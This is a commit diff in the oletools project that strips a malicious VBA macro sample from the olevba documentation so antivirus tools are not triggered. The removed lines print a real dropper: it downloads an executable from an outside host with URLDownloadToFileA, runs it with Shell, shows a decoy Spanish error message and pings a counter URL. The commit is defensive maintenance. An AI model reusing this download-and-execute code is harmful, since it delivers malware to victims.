Commit 41d98ad562d0db71e23f0c669b2776271fde10a0
1 parent
aaa7c73f
olevba: removed malicious code from documentation to avoid triggering antivirus
Showing
1 changed file
with
2 additions
and
12 deletions
oletools/doc/olevba.md
| @@ -157,20 +157,10 @@ For example, checking the malware sample [DIAN_caso-5415.doc](https://malwr.com/ | @@ -157,20 +157,10 @@ For example, checking the malware sample [DIAN_caso-5415.doc](https://malwr.com/ | ||
| 157 | SNVJYQ | 157 | SNVJYQ |
| 158 | End Sub | 158 | End Sub |
| 159 | Public Sub SNVJYQ() | 159 | Public Sub SNVJYQ() |
| 160 | - OGEXYR "http://germanya.com.ec/logs/test.exe", Environ("TMP") & "\sfjozjero. | ||
| 161 | - exe" | 160 | + [Malicious Code...] |
| 162 | End Sub | 161 | End Sub |
| 163 | Function OGEXYR(XSTAHU As String, PHHWIV As String) As Boolean | 162 | Function OGEXYR(XSTAHU As String, PHHWIV As String) As Boolean |
| 164 | - Dim HRKUYU, lala As Long | ||
| 165 | - HRKUYU = URLDownloadToFileA(0, XSTAHU, PHHWIV, 0, 0) | ||
| 166 | - If HRKUYU = 0 Then OGEXYR = True | ||
| 167 | - Dim YKPZZS | ||
| 168 | - YKPZZS = Shell(PHHWIV, 1) | ||
| 169 | - MsgBox "El contenido de este documento no es compatible con este equipo." & | ||
| 170 | - vbCrLf & vbCrLf & "Por favor intente desde otro equipo.", vbCritical, "Equipo no | ||
| 171 | - compatible" | ||
| 172 | - lala = URLDownloadToFileA(0, "http://germanya.com.ec/logs/counter.php", Envi | ||
| 173 | - ron("TMP") & "\lkjljlljk", 0, 0) | 163 | + [Malicious Code...] |
| 174 | Application.DisplayAlerts = False | 164 | Application.DisplayAlerts = False |
| 175 | Application.Quit | 165 | Application.Quit |
| 176 | End Function | 166 | End Function |